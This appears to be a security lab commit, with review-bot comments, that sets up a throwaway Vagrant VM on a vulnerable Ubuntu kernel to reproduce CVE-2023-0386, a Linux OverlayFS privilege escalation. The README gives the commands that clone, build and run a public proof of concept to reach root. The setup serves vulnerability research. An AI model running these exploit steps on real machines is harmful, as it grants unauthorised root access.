
Commit 2c73398

Add CVE-2023-0386 reproduction
1 parent 275d8fe commit 2c73398


5 files changed

+66
-0
lines changed

@@ -0,0 +1 @@
1+
.vagrant
@@ -0,0 +1,45 @@
1+
# CVE-2023-0386
2+
3+
This folder contains a virtual machine and instructions to reproduce [CVE-2023-0386](https://nvd.nist.gov/vuln/detail/CVE-2023-0386), a vulnerability in the Linux kernel’s OverlayFS subsystem that allows an unprivileged user to escalate their privileges to root.
4+
5+
## How to reproduce
6+
7+
* Start the virtual machine (based on Ubuntu 22.04.1, kernel 5.15.0-57-generic):
8+
9+
```
10+
vagrant up
11+
```
12+
13+
* SSH to the machine as an unprivileged user:
14+
15+
```
16+
vagrant ssh --command "sudo su john -c 'cd; bash'"
17+
```
18+
19+
```bash
20+
john@ubuntu-jammy:~$ id
21+
uid=1002(john) gid=1002(john) groups=1002(john)
22+
```
23+
24+
* Clone and compile the [proof of concept repository](https://github.com/xkaneiki/CVE-2023-0386/)
25+
26+
```
27+
git clone https://github.com/xkaneiki/CVE-2023-0386.git
28+
cd CVE-2023-0386
29+
git checkout c4c65cefca1365c807c397e953d048506f3de195
30+
make all
31+
```
32+
33+
* Run the following commands to exploit the vulnerability and escalate to root:
34+
35+
```
36+
./fuse ./ovlcap/lower ./gc >/dev/null 2>&1 &
37+
./exp
38+
```
39+
40+
![](./screenshot.png)
41+
42+
## Credits
43+
44+
Proof-of-concept: https://github.com/xkaneiki/CVE-2023-0386/
45+
Reproduction for Datadog: Ryan Simon
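Review bot: The last step, `./exp`, is followed only by an image with empty alt text (`![](./screenshot.png)`), so the README never states in text what a successful reproduction looks like. Add the expected `id` output after the run, the same way the unprivileged `id` output is shown earlier, and give the image alt text. The steps also end with the VM still running; a closing `vagrant destroy` step would tell readers how to tear the lab down. Minor style point: the `id` block is fenced as `bash` while every other block is untagged.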
@@ -0,0 +1,11 @@
1+
Vagrant.configure("2") do |config|
2+
config.vm.box="ubuntu-22.04-vulnerable"
3+
config.vm.box_url = "https://cloud-images.ubuntu.com/releases/22.04/release-20230107/ubuntu-22.04-server-cloudimg-amd64-vagrant.box"
4+
config.vm.box_download_checksum = "f37c8dbda2d712ffb6242b7b9d88058298caf3a860ae29620de1cd4d02b59a9a"
5+
config.vm.box_download_checksum_type = "sha256"
6+
7+
# Disable the default synced folder
8+
config.vm.synced_folder '.', '/vagrant', disabled: true
9+
10+
config.vm.provision "shell", path: "provision.sh"
11+
end
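Review bot: The comment above `config.vm.synced_folder '.', '/vagrant', disabled: true` says what is disabled but not why. Since this VM exists to run a root exploit, state that the share is turned off to keep the guest away from the host directory, so nobody re-enables it later for convenience. Style: `config.vm.box="ubuntu-22.04-vulnerable"` has no spaces around `=`, unlike the assignments on the following lines.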
@@ -0,0 +1,9 @@
1+
#!/bin/bash
2+
3+
# Pre-requisites
4+
sudo apt update
5+
sudo apt-get install -y make gcc libfuse-dev libcap-dev
6+
7+
8+
# Underprivileged user
9+
sudo useradd john --create-home --shell /bin/bash
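Review bot: `sudo useradd john --create-home --shell /bin/bash` fails on a second `vagrant provision` because the user already exists, and with no `set -e` at the top a failed `apt-get install` goes unnoticed until `make all` breaks in the README steps. Guard the `useradd` with an `id john` check and add `set -euo pipefail` after the shebang. The script also mixes `apt update` with `apt-get install`; use `apt-get update`, since `apt` warns that its CLI is not stable for scripts. A comment noting that the script must not upgrade packages, because the README depends on kernel 5.15.0-57-generic, would document a constraint that is easy to break.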